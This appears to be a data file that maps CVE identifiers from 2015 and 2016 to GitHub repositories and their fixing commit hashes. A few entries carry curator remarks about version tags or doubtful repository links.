+CVE-2015-0286;https://github.com/openssl/openssl;None:None;False;e677e8d13595f7b3287f8feef7676feb301b0e8a,c3c7fb07dc975dc3c9de0eddb7d8fd79fc9c67c1,02758836731658381580e282ff403ba07d87b2f8,497d0b00dca876beb6c81f2ea6d7160897434c2e,c982285ab63adeb473197d54d246d120bf60778b; identified more twins +CVE-2015-0287;https://github.com/openssl/openssl;None:None;False;8106d61c354430d6bbbd7f8e7840a39efc0f5829,b717b083073b6cacc0a5e2397b661678aff7ae7f,7746ff501c65968203f376e46bd1eeb93efb0f64,674341f1b0548e36a6cc49917334f5cbd09aaa2c,b485d976340d3ca080060c3c7dee9102e2200762; +CVE-2015-0288;https://github.com/openssl/openssl;None:None;False;28a00bcd8e318da18031b2ac8778c64147cd54f9,241cff623e2b0f7c435a3a80ae783c29d994f061,4bf7b291692c59270ddca0e62de1f11611591cfc,51527f1e3564f210e984fe5b654c45d34e4f03d7,9fdbaf3a322689a58381c724e4f3497320a69581; +CVE-2015-0289;https://github.com/openssl/openssl;None:None;False;c0334c2c92dd1bc3ad8138ba6e74006c3631b0f9,544e3e3b69d080ee87721bd03c37b4d450384fb9,c225c3cf9bd67297fb0c297768d69cbc03fbdab7; +CVE-2015-0290;https://github.com/openssl/openssl;None:None;False;1d2a18dc5a3b3363e17db5af8b6b0273856ac077,77c77f0a1b9f15b869ca3342186dfbedd1119d0e; +CVE-2015-0292;https://github.com/openssl/openssl;None:None;False;fce3821111e3307a599d2378f2cca2ef2097c6c4,d0666f289ac013094bbbf547bfbcd616199b7d2d,9febee02720902c195fe929ecfe06362c551422c,84fe686173d519dfee5d264272beab666508fc57; +CVE-2015-0293;https://github.com/openssl/openssl;None:None;False;86f8fb0e344d62454f8daf3e15236b2b59210756,5cc6509dae697f0e74aaba73e1635f269a9c5e61; vulnerable tag is fixed +CVE-2015-0838;https://github.com/dulwich/dulwich;None:None;False;b25e8390074060ea2aed25cf070b8e98b85a3875; +CVE-2015-0846;https://github.com/jamesturk/django-markupfield;None:None;False;b45734ea1d206abc1ed2a90bdc779708066d49f3; +CVE-2015-1169;https://github.com/apereo/cas;None:None;False;8d22bfcb328a1948f40d29e11bdddc572e8d1363,1a8c5e98b81c649ce06a6a6ac8c5a6a9abddce73; +CVE-2015-1208;https://github.com/FFmpeg/FFmpeg;None:None;False;3ebd76a9c57558e284e94da367dd23b435e6a6d0,54b76eb5951502d24618c335d0bb275f70d31f3c; +CVE-2015-1326;https://github.com/martinpitt/python-dbusmock;None:None;False;4e7d0df909338eb3c44b083722c7bf8b76bdf940; +CVE-2015-1772;https://github.com/apache/hive;None:None;False;6929846a8120eaf094b914b4ca8af80b65f891c8; 1.1.1 did not contain it +CVE-2015-1782;https://github.com/libssh2/libssh2;None:None;False;7d94b69b802c03e8d7726f4ae61baba52cb7d871; +CVE-2015-1788;https://github.com/openssl/openssl;None:None;False;4924b37ee01f71ae19c94a8934b80eeb2f677932,40b8eb792d591d19751afc4d056c8e84260bdeb8,f61bbf8da532038ed0eae16a9a11771f3da22d30; +CVE-2015-1789;https://github.com/openssl/openssl;None:None;False;9bc3665ac9e3c36f7762acd3691e1115d250b030,57de3216e27c2e52bc3bc5bc7c94babdb7022179,f48b83b4fb7d6689584cf25f61ca63a4891f5b11,fa57f74a3941db6b2efb2f43c6add914ec83db20,370ac320301e28bb615cee80124c042649c95d14; +CVE-2015-1791;https://github.com/openssl/openssl;None:None;False;708cf593587e2fda67dae9782991ff9fccc781eb,dcad51bc13c9b716d9a66248bcc4038c071ff158,27c76b9b8010b536687318739c6f631ce4194688,370ac320301e28bb615cee80124c042649c95d14,939b4960276b040fc0ed52232238fcc9e2e9ec21,98ece4eebfb6cd45cc8d550c6ac0022965071afc,39bcfb129e816de00bf2170c3497e8104767beb7,8b4fd12b0d1734d281994000752c771e8cd0a103,467daf6b6ef0753ccfc5c024c2f63c948354d698,db96b5ab761fb97633dde9aec62c0032743e88f8,9545eac45bc79496763d2ded02629f88a8629fb9,0ae3473e8578b547100389bd029873af0cd9a22e,907f04a30354615e54beaa2bc0b986083f7793ee,106a9a5d7e26e728a654d7424849081bd988d4a5,d44f89c990b4c9c41f77e9a0ffd5dc7c4ca07f84; +CVE-2015-1792;https://github.com/openssl/openssl;None:None;False;dd90a91d8771fd1ad5083fd46a2b3da16a587757,857b2ced04be897488df311a257f254ad8516429,aa5ab40860deb3dc6d4d4c98a4efea99f7040a46,92f9a8bf3844359bb50d86dab92bc24b074d350d; advisory links wrong commit +CVE-2015-1793;https://github.com/openssl/openssl;None:None;False;9a0db453ba017ebcaccbee933ee6511a9ae4d1c8,2aacec8f4a5ba1b365620a7b17fcce311ada93ad,21376d8ae310cf0455ca2b73c8e9f77cafeb28dd,cb22d2ae5a5b6069dbf66dbcce07223ac15a16de,b3b1eb5735c5b3d566a9fc3bf745bf716a29afa0,aae41f8c54257d9fa6904d3a9aa09c5db6cefd0d,692f07c3e0c04180b56febc2feb57cd94395a7a2; +CVE-2015-1830;https://github.com/apache/activemq;None:None;False;729c4731574ffffaf58ebefdbaeb3bd19ed1c7b7,9fd5cb7dfe0fcc431f99d5e14206e0090e72f36b; +CVE-2015-1838;https://github.com/saltstack/salt;None:None;False;e11298d7155e9982749483ca5538e46090caef9c; +CVE-2015-2068;https://github.com/dweeves/magmi-git;None:None;False;da400ea5772dd7427c2c1732a6a3a29363bbabdf,408320a2118f7474a482e968cd72c881bc712564; +CVE-2015-2156;https://github.com/netty/netty;None:None;False;97d871a7553a01384b43df855dccdda5205ae77a,d98b21be045a315ced88ada84000e4757cfb9892; +CVE-2015-2296;https://github.com/psf/requests;None:None;False;e776bb26560fe5e9fe7ae72719519e1d011b5d23,3bd8afbff29e50b38f889b2f688785a669b9aafc; +CVE-2015-2912;https://github.com/orientechnologies/orientdb;None:None;False;f11dbced94cb587f445cb99db08735c023921053,d5a45e608ba8764fd817c1bdd7cf966564e828e9,5dbd6035e4e59259f3e08ba8f1218785f36d1d2d; +CVE-2015-2913;https://github.com/orientechnologies/orientdb;None:None;False;7a5f61527343eae30ee0e5dfdcae60da412c69c3,668ece96be210e742a4e2820a3085b215cf55104; +CVE-2015-3010;https://github.com/ceph/ceph-deploy;None:None;False;eee56770393bf19ed2dd5389226c6190c08dee3f,3cdc6cb555173130d64ea6d90033a6e00cbde330; +CVE-2015-3192;https://github.com/spring-projects/spring-framework;None:None;False;d79ec68db40c381b8e205af52748ebd3163ee33b,9c3580d04e84d25a90ef4c249baee1b4e02df15e,5a711c05ec750f069235597173084c2ee7962424; +CVE-2015-3193;https://github.com/openssl/openssl;None:None;False;29851264f11ccc70c6c0140d7e3d8d93ef5c9b11,d73cc256c8e256c32ed959456101b73ba9842f72; +CVE-2015-3195;https://github.com/openssl/openssl;None:None;False;cf432b3b1bd7caa22943b41b94ec2472ae497dc6,cc598f321fbac9c04da5766243ed55d55948637d,b29ffa392e839d05171206523e84909146f7a77c,2cdafc51f008e65b2d5263a80ad0e89e9b56c8d3; +CVE-2015-3196;https://github.com/openssl/openssl;None:None;False;3c66a669dfc7b3792f7af0758ea26fe8502ce70c,d6be3124f22870f1888c532523b74ea5d89795eb,1392c238657ec745af6a40def03d67d4ce02a082; +CVE-2015-3197;https://github.com/openssl/openssl;None:None;False;d81a1600588b726c2bdccda7efad3cc7a87d6245,4040a7fd104b412bd446338c6c28a62eb7d8e852; +CVE-2015-3206;https://github.com/02strich/pykerberos;None:None;False;02d13860b25fab58e739f0e000bed0067b7c6f9c; +CVE-2015-3208;https://github.com/apache/activemq-artemis;None:None;False;48d9951d879e0c8cbb59d4b64ab59d53ef88310d; +CVE-2015-3220;https://github.com/trevp/tlslite;None:None;False;aca8d4f898b436ff6754e1a9ab96cae976c8a853; +CVE-2015-3253;https://github.com/apache/groovy;None:None;False;4a96e70f6315d3b28fc6f878e4d59dfba585a179,4df8b652aa018a5d5d1cda8fba938bf3422db31c,09e9778e8a33052d8c27105aee5310649637233d,716d3e67e744c7edeed7cbc3f874090d39355764; +CVE-2015-3395;https://github.com/FFmpeg/FFmpeg;None:None;False;f7e1367f58263593e6cee3c282f7277d7ee9d553,99a69249837079417ca8bec6dd0515ca996a748e,33877cd276f99fc234b5269d9d158ce71e50d363,539172c85b13796fe5ce2a7482f436b6e9b33cf6,48c7fe5b5834a197f10a6eb56cbe7cda8ee32407,a376ef4a17edb947bbcf54171daa914bd4585a4f,dfce316c12d867400fb132ff5094163e3d2634a3,70642090960c35dcd6da941c869bdf55d4f3bb00,5ecabd3c54b7c802522dc338838c9a4c2dc42948; +CVE-2015-3627;https://github.com/docker-archive/libcontainer;None:None;False;46132cebcf391b56842f5cf9b247d508c59bc625; +CVE-2015-3996;https://github.com/AFNetworking/AFNetworking;None:None;False;3e631b203dd95bb82dfbcc2c47a2d84b59d1eeb4; +CVE-2015-4053;https://github.com/ceph/ceph-deploy;None:None;False;9f9fd6e3372043bd2fd67582324c8fb5d7aa361e,6fc7f7f58b338fa920a6a570485836fe91b6de21,ab240e32061ba5f89fca3d145fa229e8c8284edd,628bd9ed6bfb84821ba7d2240cc41a8783cc4617,5368d9d14d3bfbef480d1302511121768d557d5e,8ef6d41e5bdbaf2717671c1ace237d35fa8ebcb4,f898b4cf44abc1f7fe472b59e009e6ff44e441a7; +CVE-2015-4082;https://github.com/jborg/attic;None:None;False;78f9ad1faba7193ca7f0acccbc13b1ff6ebf9072; +CVE-2015-4410;https://github.com/mongoid/moped;None:None;False;dd5a7c14b5d2e466f7875d079af71ad19774609b; wrong repository??? +CVE-2015-4412;https://github.com/mongodb/bson-ruby;None:None;False;976da329ff03ecdfca3030eb6efe3c85e6db9999; there is also a false positive (vulnerability introducing commit) +CVE-2015-4619;https://github.com/denkGroot/Spina;None:None;False;bfe44f289e336f80b6593032679300c493735e75; +CVE-2015-4706;https://github.com/ipython/ipython;None:None;False;6884e8b36dc1e2d59e1d8ddb5e95788728d76e6f,7222bd53ad089a65fd610fab4626f9d0ab47dfce,c2078a53543ed502efd968649fee1125e0eb549c; +CVE-2015-5081;https://github.com/django-cms/django-cms;None:None;False;f77cbc607d6e2a62e63287d37ad320109a2cc78a; +CVE-2015-5147;https://github.com/vmg/redcarpet;None:None;False;2cee777c1e5babe8a1e2683d31ea75cc4afe55fb; +CVE-2015-5159;https://github.com/latchset/kdcproxy;None:None;False;f274aa6787cb8b3ec1cc12c440a56665b7231882,5edbbeb7f950ed9db60b11f0fdce1ec96194f761; +CVE-2015-5207;https://github.com/apache/cordova-ios;None:None;False;a14e08eaa95211450f513c64d569d8c333dee4c5; commit outside the time interval +CVE-2015-5211;https://github.com/spring-projects/spring-framework;None:None;False;a95c3d820dbc4c3ae752f1b3ee22ee860b162402,03f547eb9868f48f44d59b56067d4ac4740672c3,2bd1daa75ee0b8ec33608ca6ab065ef3e1815543; +CVE-2015-5241;https://github.com/apache/juddi;None:None;False;018b5623cbf34b5810a1c6a7813d7d3c320bdbe0; +CVE-2015-5250;https://github.com/openshift/origin;None:None;False;dace5075e31b74703e944b6b3ebe8836be8d1b9a,5d021b0f3e0902b599fd8f528eb28a710aed223a,c55e4c7d12e15d83642b5872e620ecc5b35cb947; +CVE-2015-5253;https://github.com/apache/cxf;None:None;False;845eccb6484b43ba02875c71e824db23ae4f20c0,a61db289f87e448292f7ff0d0a3d25792dd4d42d,02245c656941f28b6b2be5e461e6db04a70d2436; +CVE-2015-5254;https://github.com/apache/activemq;None:None;False;e7a4b53f799685e337972dd36ba0253c04bcc01f,6f03921b31d9fefeddb0f4fa63150ed1f94a14b1,a7e2a44fe8d4435ae99532eb0ab852e6247f7b16,e100638244c4ca5eb2a1f16bcdc671c9859c2694; +CVE-2015-5305;https://github.com/kubernetes/kubernetes;None:None;False;8e07d2fc9312ed4f4fddd05d816b299754c1e967,63fb6c07a565fcb94df7778ad12f810ea1b3cdce,68f2add9bd5d43b9da1424d87d88f83d120e17d0,37f730f68c7f06e060f90714439bfb0dbb2df5e7; NVD does not contain versions at all +CVE-2015-5344;https://github.com/apache/camel;None:None;False;157c0b4a3c8017de432f1c99f83e374e97dc4d36,4cdc6b177ee7391eedc9f0b695c05d56f84b0812,b7afb3769a38b8e526f8046414d4a71430d77df0,369d0a6d605055cb843e7962b101e3bbcd113fec,8386d8f7260143802553bc6dbae2880d6c0bafda,4491c080cb6c8659fc05441e49307b7d4349aa56; +CVE-2015-5349;https://github.com/apache/directory-studio;None:None;False;ac57a26fcb98aa17fe9534575cf5fdad00a1c839; +CVE-2015-5607;https://github.com/ipython/ipython;None:None;False;1415a9710407e7c14900531813c15ba6165f0816,a05fe052a18810e92d9be8c1185952c13fe4e5b0; +CVE-2015-6524;https://github.com/apache/activemq;None:None;False;22f2f3dde757d31307da772d579815c1d169bc39; +CVE-2015-6584;https://github.com/DataTables/DataTablesSrc;None:None;False;ccf86dc5982bd8e16d11a0815c940f5b256874c9; +CVE-2015-6748;https://github.com/jhy/jsoup;None:None;False;4edb78991f8d0bf87dafde5e01ccd8922065c9b2,b86beca8feb26f9a3181e87fe36382f8ab4bdb98; +CVE-2015-6818;https://github.com/FFmpeg/FFmpeg;None:None;False;47f4e2d8960ca756ca153ab8e3e93d80449b8c91,e84d17c7c991f380622f6d2f25994dc6955d853c; +CVE-2015-6821;https://github.com/FFmpeg/FFmpeg;None:None;False;b160fc290cf49b516c5b6ee0730fd9da7fc623b1,88fa3243ddf320ce1d6691c6098e87263bd6d0ca; +CVE-2015-6822;https://github.com/FFmpeg/FFmpeg;None:None;False;39bbdebb1ed8eb9c9b0cd6db85afde6ba89d86e4,237751eb257fd528a91f35f0a835c2273957ee62; +CVE-2015-6823;https://github.com/FFmpeg/FFmpeg;None:None;False;f7068bf277a37479aecde2832208d820682b35e6,264eb0074f3b0591c9430b20927d6547c8757c48; +CVE-2015-6824;https://github.com/FFmpeg/FFmpeg;None:None;False;a5d44d5c220e12ca0cb7a4eceb0f74759cb13111,1cbd7b08f661163ea0f41f03752e420a47904c11; +CVE-2015-6826;https://github.com/FFmpeg/FFmpeg;None:None;False;3197c0aa87a3b7190e17d49e6fbc7b554e4b3f0a; +CVE-2015-6918;https://github.com/saltstack/salt;None:None;False;28aa9b105804ff433d8f663b2f9b804f2b75495a,528916548726976dcc75626dc6f6641ceb206ee3; +CVE-2015-7294;https://github.com/vesse/node-ldapauth-fork;None:None;False;3feea43e243698bcaeffa904a7324f4d96df60e4; +CVE-2015-7314;https://github.com/gollum/gollum;None:None;False;ce68a88293ce3b18c261312392ad33a88bb69ea1,de5aed2f6a6f9ad62cae05dc59d16fbfdd7a4543; +CVE-2015-7315;https://github.com/zopefoundation/Products.CMFCore;None:None;False;a4ff51ce26c50001db0f7856009771340e6ecda3,e1dc70a6198073f2ceedbe725a93cde57c7bfb34,13b83717b2c3a9fb2f0c16c436ec8d986f42b0e5,e1d981bfa14b664317285f0f36498f4be4a23406; +CVE-2015-7316;https://github.com/plone/Products.CMFPlone;None:None;False;3da710a2cd68587f0bf34f2e7ea1167d6eeee087,1845b0a92312291811b68907bf2aa0fb448c4016; +CVE-2015-7337;https://github.com/ipython/ipython;None:None;False;0a8096adf165e2465550bd5893d7e352544e5967; +CVE-2015-7528;https://github.com/kubernetes/kubernetes;None:None;False;afd56495a1052a3387b81df1786a8d0f51bc8671,4b1afe5b7483cba2907032b5910fcd41a48bbbec,da039b4a940a471d7025ce882b8392f8de10ea2b,9158aa1f09213c6e7118c55a95442d8a12d496b2; this was kubernetes +CVE-2015-7541;https://github.com/quadule/colorscore;None:None;False;570b5e854cecddd44d2047c44126aed951b61718; +CVE-2015-7559;https://github.com/apache/activemq;None:None;False;338a74dfa42a7b19d39adecacfa5f626a050e807,b8fc78ec6c367cbe2a40a674eaec64ac3d7d1ecb; vulnerable tag is fixed +CVE-2015-7577;https://github.com/rails/rails;None:None;False;0fde6f554b75b13b0435dd70f1c3ec02bc209e0d,5875bc3adeff7583cd2fca756f8c61fcb1bc2366,cdabc95608336dbea7b6a3a3e925de5bbd5313ba,2cb466353f2af080e73eaf66ba033ee27df9b9b5; +CVE-2015-7809;https://github.com/fabpot/Twig;None:None;False;30be07759a3de2558da5224f127d052ecf492e8f; +CVE-2015-8213;https://github.com/django/django;None:None;False;316bc3fc9437c5960c24baceb93c73f1939711e4,3ebbda0aef9e7a90ac6208bb8f9bc21228e2c7da,9f83fc2f66f5a0bac7c291aec55df66050bb6991,8a01c6b53169ee079cb21ac5919fdafcc8c5e172; +CVE-2015-8216;https://github.com/FFmpeg/FFmpeg;None:None;False;d24888ef19ba38b787b11d1ee091a3d94920c76a,fdb884263974b19584a4f37508d71bc60189f512; +CVE-2015-8217;https://github.com/FFmpeg/FFmpeg;None:None;False;93f30f825c08477fe8f76be00539e96014cc83c8,ff30907205fc4a9666a7ee93ca456e3a5bcacbc0; +CVE-2015-8218;https://github.com/FFmpeg/FFmpeg;None:None;False;d4a731b84a08f0f3839eaaaf82e97d8d9c67da46,a7bbb7fb884a02a7b380ef7afa787fca756b9d82; +CVE-2015-8309;https://github.com/devsnd/cherrymusic;None:None;False;62dec34a1ea0741400dd6b6c660d303dcd651e86; +CVE-2015-8310;https://github.com/devsnd/cherrymusic;None:None;False;62dec34a1ea0741400dd6b6c660d303dcd651e86; +CVE-2015-8618;https://github.com/golang/go;None:None;False;0027ed1872cdec08defe3b097c7123eaaf149e30,4306352182bf94f86f0cfc6a8b0ed461cbf1d82c; +CVE-2015-8747;https://github.com/Unrud/Radicale;None:None;False;bcaf452e516c02c9bed584a73736431c5e8831f1; +CVE-2015-8748;https://github.com/Kozea/Radicale;None:None;False;1109973a925970353dfd13c6df8de0e4e446d983,4bfe7c9f7991d534c8b9fbe153af9d341f925f98; +CVE-2015-8814;https://github.com/umbraco/Umbraco-CMS;None:None;False;18c3345e47663a358a042652e697b988d6a380eb; +CVE-2015-8854;https://github.com/markedjs/marked;None:None;False;a37bd643f05bf95ff18cafa2b06e7d741d2e2157; +CVE-2015-8861;https://github.com/handlebars-lang/handlebars.js;None:None;False;83b8e846a3569bd366cf0b6bdc1e4604d1a2077e; +CVE-2015-8862;https://github.com/janl/mustache.js;None:None;False;378bcca8a5cfe4058f294a3dbb78e8755e8e0da5; +CVE-2015-8968;https://github.com/square/git-fastclone;None:None;False;14198fe12443055839b1ba4cc294b04a38ae15f1,a8a33f187214185b885a10bcfe2527c74da84a8c,2b7a0be1ff8a4de2f43338e91649d6c4988bf994,93a4634abca94464387a8bde5a3062e858fc0f1e; +CVE-2015-9235;https://github.com/auth0/node-jsonwebtoken;None:None;False;1bb584bc382295eeb7ee8c4452a673a77a68b687; +CVE-2015-9241;https://github.com/hapijs/hapi;None:None;False;aab2496e930dce5ee1ab28eecec94e0e45f03580; +CVE-2015-9243;https://github.com/hapijs/hapi;None:None;False;270e9a768b2fbb84ab832869d2de606c865f0e85,353bf2661d15f4529e6f70498681a385ec2daa77; +CVE-2015-9251;https://github.com/jquery/jquery;None:None;False;b078a62013782c7424a4a61a240c23c4c0b42614,f60729f3903d17917dc351f3ac87794de379b0cc; +CVE-2016-0750;https://github.com/infinispan/infinispan;None:None;False;f2989a9b7b5ef2d3be690250d9d1bc7b2fa045d7; +CVE-2016-0762;https://github.com/apache/tomcat;None:None;False;970e615c7ade6ec6c341470bbc76aa1256353737,86b2e436099cb48f30dad950175c5beeeb763756; +CVE-2016-1505;https://github.com/Unrud/Radicale;None:None;False;b4b3d51f33c7623d312f289252dd7bbb8f58bbe6; +CVE-2016-1905;https://github.com/deads2k/kubernetes;None:None;False;21a5d57c7551d99d195a38edc8b06bdc807aa4c1,e90c2bd7dcf506dee91f30ea35b3c72f83a38fba; +CVE-2016-2108;https://github.com/openssl/openssl;None:None;False;d7ab691bc479d3cf2eea07329db6ce0e2589f0b9,a0eed48d37a4b7beea0c966caf09ad46f4a92a44,f5da52e308a6aeea6d5f3df98c4da295d7e9cc27,32d3b0f52f77ce86d53f38685336668d47c5bdfe,3661bb4e7934668bd99ca777ea8b30eedfafa871; was 1.0.2b:1.0.2c +CVE-2016-2160;https://github.com/openshift/origin;None:None;False;2d0350c84150d88be4d1ac181694366832a55709,26e798bea2f765fcb48ae351321b7ae38a329201,a77c100b57f481d5a729bebbc8771222e147964d; does not specify versions (1.1.4 is fixed) +CVE-2016-2166;https://github.com/apache/qpid-proton;None:None;False;a0585851e1e8ed9678496e38278f4a7554d03636; fixed tag is vulnerable (happend when using git svn and the copying to github) +CVE-2016-2177;https://github.com/openssl/openssl;None:None;False;a004e72b95835136d3f1ea90517f706c24c03da7,6f35f6deb5ca7daebe289f86477e061ce3ee5f46; +CVE-2016-2512;https://github.com/django/django;None:None;False;c5544d289233f501917e25970c03ed444abbd4f0,ada7a4aefb9bec4c34667b511022be6057102f98,fc6d147a63f89795dbcdecb0559256470fff4380,382ab137312961ad62feb8109d70a5a581fe8350; +CVE-2016-2513;https://github.com/django/django;None:None;False;67b46ba7016da2d259c1ecc7d666d11f5e1cfaab,af7d09b0c5c6ab68e629fd9baf736f9dd203b18e,f4e6e02f7713a6924d16540be279909ff4091eb6; +CVE-2016-2537;https://github.com/mafintosh/is-my-json-valid;None:None;False;eca4beb21e61877d76fdf6bea771f72f39544d9b; +CVE-2016-2788;https://github.com/puppetlabs/marionette-collective;None:None;False;4de959d0eae2b4cfc5ed4a0f5f659d4bf49cbedb,39dc1af951e880bf787d48d860cf0da25e6725ea,4918a0f136aea04452b48a1ba29eb9aabcf5c97d; +CVE-2016-3081;https://github.com/apache/struts;None:None;False;f238cf4f1091be19fbcfd086b042c86a1bcaa7fc,5190b53673a710ead31bbb5f82cf4ca171994629; +CVE-2016-3092;https://github.com/apache/tomcat;None:None;False;8999f8243197a5f8297d0cb1a0d86ed175678a77,2c3553f3681baf775c50bb0b49ea61cb44ea914f,8e67e4a4799a9765b3bd777eed3ee17f00514441; +CVE-2016-3094;https://github.com/apache/qpid-broker-j;None:None;False;24aaee1df7c3e408d89bebbc3426bcdd94dfb6c0,a4c8ecf0ac4884f63cfd57c07c12a144863c896c; +CVE-2016-3114;https://github.com/NexMirror/Kallithea;None:None;False;460fec61ad108252b7f56575211914e0f82ea6e8; +CVE-2016-3693;https://github.com/svenfuchs/safemode;None:None;False;0f764a1720a3a68fd2842e21377c8bfad6d7126f; +CVE-2016-3720;https://github.com/FasterXML/jackson-dataformat-xml;None:None;False;f0f19a4c924d9db9a1e2830434061c8640092cc0; +CVE-2016-3959;https://github.com/golang/go;None:None;False;eb876dd83cb8413335d64e50aae5d38337d1ebb4,2cfbb875208f4acecfb0b72de5aebe37e8d03a35,2d8ecac3d0dbceed8830a43a3e752770577ffed1; +CVE-2016-4000;https://github.com/jython/frozen-mirror;None:None;False;4c337213bd2964bb36cef2d31509b49647ca6f2a; +CVE-2016-4009;https://github.com/python-pillow/Pillow;None:None;False;1723dc2d0709d4e3e65333dfcabcfddd25c0f83e,4e0d9b0b9740d258ade40cce248c93777362ac1e,95a25a0d82f414a52e174eb5389d485d4b3ddf34,41fae6d9e2da741d2c5464775c7f1a609ea03798; +CVE-2016-4055;https://github.com/moment/moment;None:None;False;34af63b8b21208a949dfaf42d228502c73d20ec0,52a807b961ead925be11ff5e632c8f7325a9ce36; +CVE-2016-4425;https://github.com/akheron/jansson;None:None;False;64ce0ad3731ebd77e02897b07920eadd0e2cc318,013c3892c3b7c39516507838ababb4e9167cc65c; +CVE-2016-4438;https://github.com/apache/struts;None:None;False;76eb8f38a33ad0f1f48464ee1311559c8d52dd6d; +CVE-2016-4442;https://github.com/MiniProfiler/rack-mini-profiler;None:None;False;4273771d65f1a7411e3ef5843329308d0e2d257c; +CVE-2016-4465;https://github.com/apache/struts;None:None;False;eccc31ebce5430f9e91b9684c63eaaf885e603f9,a0fdca138feec2c2e94eb75ca1f8b76678b4d152; +CVE-2016-4562;https://github.com/ImageMagick/ImageMagick;None:None;False;726812fa2fa7ce16bcf58f6e115f65427a1c0950; +CVE-2016-4563;https://github.com/ImageMagick/ImageMagick;None:None;False;726812fa2fa7ce16bcf58f6e115f65427a1c0950; +CVE-2016-4564;https://github.com/ImageMagick/ImageMagick;None:None;False;726812fa2fa7ce16bcf58f6e115f65427a1c0950; +CVE-2016-4855;https://github.com/ADOdb/ADOdb;None:None;False;fc80385305963905a3ad9f87e6fb83df4c235198,292e4a9433fe96f02cccc2313a7198efee844214; test file... +CVE-2016-4970;https://github.com/netty/netty;None:None;False;524156f164a910b8b0978d27a2c700a19cd8048f,9e2c400f89c5badc39919f811179d3d42ac5257c; +CVE-2016-4972;https://github.com/openstack/python-muranoclient;None:None;False;b1e8a1753ccc3faf06840f675403645311ac9d79,cd182ba363a11078ae7a0595f54751c1ebddd2e0,e470430814ceddadea66d2e4bb3a9b10b55869e6; +CVE-2016-4974;https://github.com/apache/qpid-jms-amqp-0-x;None:None;False;7e6843e2e1967bfdba477a683353dbf6287d6291; +CVE-2016-4977;https://github.com/spring-projects/spring-security-oauth;None:None;False;fff77d3fea477b566bcacfbfc95f85821a2bdc2d; +CVE-2016-5007;https://github.com/spring-projects/spring-security;None:None;False;e4c13e3c0ee7f06f59d3b43ca6734215ad7d8974; +CVE-2016-5104;https://github.com/libimobiledevice/libimobiledevice;None:None;False;df1f5c4d70d0c19ad40072f5246ca457e7f9849e; +CVE-2016-5180;https://github.com/c-ares/c-ares;None:None;False;65c71be1cbe587f290432bef2f669ee6cb8ac137; +CVE-2016-5386;https://github.com/golang/go;None:None;False;b97df54c31d6c4cc2a28a3c83725366d52329223,cad4e97af8f2e0b9f09b97f67fb3a89ced2e9021,a357d15e9ee36a1232ae071d9968c4cf10a672b4; +CVE-2016-5388;https://github.com/apache/tomcat80;None:None;False;1977bf9df699c571cf3e08c2996533b959d4cb1e; +CVE-2016-5431;https://github.com/nov/jose-php;None:None;False;1cce55e27adf0274193eb1cd74b927a398a3df4b; +CVE-2016-5697;https://github.com/onelogin/ruby-saml;None:None;False;a571f52171e6bfd87db59822d1d9e8c38fb3b995; +CVE-2016-5841;https://github.com/ImageMagick/ImageMagick;None:None;False;d8ab7f046587f2e9f734b687ba7e6e10147c294b; +CVE-2016-5842;https://github.com/ImageMagick/ImageMagick;None:None;False;d8ab7f046587f2e9f734b687ba7e6e10147c294b; +CVE-2016-5851;https://github.com/python-openxml/python-docx;None:None;False;61b40b161b64173ab8e362aec1fd197948431beb; +CVE-2016-6186;https://github.com/django/django;None:None;False;93c538694e6b14a29cb0f52b784a3bfed604fda6,6fa150b2f8b601668083042324c4add534143cb1,d03bf6fe4e9bf5b07de62c1a271c4b41a7d3d158,f68e5a99164867ab0e071a936470958ed867479d; +CVE-2016-6298;https://github.com/latchset/jwcrypto;None:None;False;eb5be5bd94c8cae1d7f3ba9801377084d8e5a7ba; +CVE-2016-6304;https://github.com/openssl/openssl;None:None;False;e408c09bbf7c3057bda4b8d20bec1b3a7771c15b,2c0d295e26306e15a92eb23a84a1802005c1c137,a59ab1c4dd27a4c7c6e88f3c33747532fd144412,ea39b16b71e4e72a228a4535bd6d6a02c5edbc1f; +CVE-2016-6519;https://github.com/openstack/manila-ui;None:None;False;fca19a1b0d42536644212c5d673fbd6866e67c43,eed69d6ac444c27981f7548c7e2fbc37e836c28d,009913d725bee34cef0bd62e47a298025ace2696,89593686ef18f2bd06223b92071b4be2362a5abd; +CVE-2016-6580;https://github.com/python-hyper/priority;None:None;False;7d01a7dc4db83bce50f20d47caf4f37b403a3ecd,1d6321a387d2becaf66dc22a84db31fbbf7f8d51; +CVE-2016-6581;https://github.com/python-hyper/hpack;None:None;False;4529c1632a356cc1ab6a7fdddccd2de60a21e366,940e7d246ed5ecafb6b93be79f90d920b5ece459,15654460f247dd4fae7fa42ab02bd037b352d1b8; +CVE-2016-6652;https://github.com/spring-projects/spring-data-jpa;None:None;False;b8e7fecccc7dc8edcabb4704656a7abe6352c08f,e9bd83f820b98c54d0b5a2ec0f3f1767332a862c,a22c17fc12f7063716cb40c11d1ff4e265ef8556,edd497b9c93b4f364ffc78ca302a05938d499271; vulnerable tag is fixed +CVE-2016-6793;https://github.com/apache/wicket;None:None;False;8faa056f35bb1fe0b21a92d0450a5aadad8f7753,134686ef7185d3f96fec953136ab4847cd36b68d; vulnerable tag is fixed +CVE-2016-6794;https://github.com/apache/tomcat;None:None;False;0b41766456b1980e4f809e13ad6dc9fa912bae7e,f8db078f1e6e8b225f8344e63595113ca34cd408,c1660182010b4255c21c874d69c124370a67784a; fixed tag is vulnerable (changed) +CVE-2016-6796;https://github.com/apache/tomcat;None:None;False;f603f2f4595073f9490e01699d2083112a7c09a7,f97769f50ee2613e1bf27107a01d48907fd993ac,ffa0346fba2946401630291b642f1cff66d6a2be,fb65c5fe6d298195beee11324416a975bea6d701,bec54243e09b4a171f0a0672e5d8d3cdb281f926,1d69a4ddb363ee96b41337495eb7a263f2e01ff7; fixed tag is vulnerable (changed) +CVE-2016-6797;https://github.com/apache/tomcat;None:None;False;b3406e6c318378cbf440f902f9fdbb8b440aef4e,d6b5600afe75e1086dd564344e1d085966e4237d,2859ac3eae132383cb6f3f2042e25d7a4a281b0d; fixed tag is vulnerable (changed) +CVE-2016-6801;https://github.com/apache/jackrabbit;None:None;False;0c00609a172b3af3b86a01abbf5ed473214702ba,4d21cc25649e547520963b0f87300d656050e68c,67f2cc1ac78cd7bb721d556e8be27559efbf4e12,ea75d7c2aeaafecd9ab97736bf81c5616f703244,7fb4ba4a385069378c916b4fac3f145db802acd8,fb4fe3601717201934bcbf6eb604d2e1ef2cb7ad,991cc31a6cc3a5f87fa7951afb939ff7859db789,9e08618c73a852710cfd9904b8558ceb5c1b754c,eae001a54aae9c243ac06b5c8f711b2cb2038700; 